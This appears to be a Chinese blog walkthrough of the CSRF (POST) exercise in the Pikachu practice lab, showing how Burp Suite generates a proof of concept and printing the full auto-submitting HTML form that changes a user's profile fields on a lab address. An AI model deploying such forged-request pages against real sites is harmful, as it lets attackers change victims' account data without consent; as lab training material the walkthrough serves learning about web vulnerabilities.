Pikachu-csrf-CSRF(POST)

什么鬼昵称2024-10-07 10:57

发起请求

拦截抓包,在请求信息中, Engagement Tool --》generate CSRF PoC

得到以下 html 代码 ,生成poc.html 文件,当用户点击

复制代码 
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.3.224:8082/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="11" />
      <input type="hidden" name="phonenum" value="11" />
      <input type="hidden" name="add" value="11" />
      <input type="hidden" name="email" value="1234" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

打开 poc.html 页面,点击submit request ,即可达成攻击;

相关推荐
我是小疯子666 分钟前
jQuery快速入门指南
前端
傻啦嘿哟8 分钟前
Python中的@property:优雅控制类成员访问的魔法
前端·数据库·python
北辰alk22 分钟前
Vue 自定义指令生命周期钩子完全指南
前端·vue.js
是小崔啊22 分钟前
03-vue2
前端·javascript·vue.js
学习非暴力沟通的程序员42 分钟前
Karabiner-Elements 豆包语音输入一键启停操作手册
前端
Jing_Rainbow1 小时前
【 前端三剑客-39 /Lesson65(2025-12-12)】从基础几何图形到方向符号的演进与应用📐➡️🪜➡️🥧➡️⭕➡️🛞➡️🧭
前端·css·html
刘羡阳1 小时前
使用Web Worker的经历
前端·javascript
!执行1 小时前
高德地图 JS API 在 Linux 系统的兼容性解决方案
linux·前端·javascript
Gooooo1 小时前
现代浏览器的工作原理
前端
kk晏然2 小时前
TypeScript 错误类型检查,前端ts错误指南
前端·react native·typescript·react
热门推荐
01GitHub 镜像站点02Linux下V2Ray安装配置指南03网站改了域名,如何查找?04Labelme从安装到标注:零基础完整指南05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南06UV安装并设置国内源07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Claude Code Skills 实用使用手册09百度网盘偷偷给电脑“降频”?10MC.JS:基于Web技术的网页版《我的世界》,免安装在线畅玩,支持存档